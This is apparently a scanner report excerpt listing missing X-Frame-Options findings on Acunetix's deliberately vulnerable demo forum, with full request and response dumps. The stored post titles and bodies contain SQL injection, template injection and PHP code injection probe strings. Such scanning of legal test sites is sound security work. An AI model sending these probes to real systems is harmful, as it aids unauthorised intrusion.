Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4189 |
Response Body - size: 4,189 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx[[${98991*97996}]]xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx[[${98991*97996}]]xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx[[${98991*97996}]]xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4145 |
Response Body - size: 4,145 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}\</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx__${98991*97996}__::.x </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx__${98991*97996}__::.x </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx__${98991*97996}__::.x - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4203 |
Response Body - size: 4,203 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+627-627-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+627-627-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+627-627-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
Response Body - size: 4,144 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'.print(md5(31337)).'</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
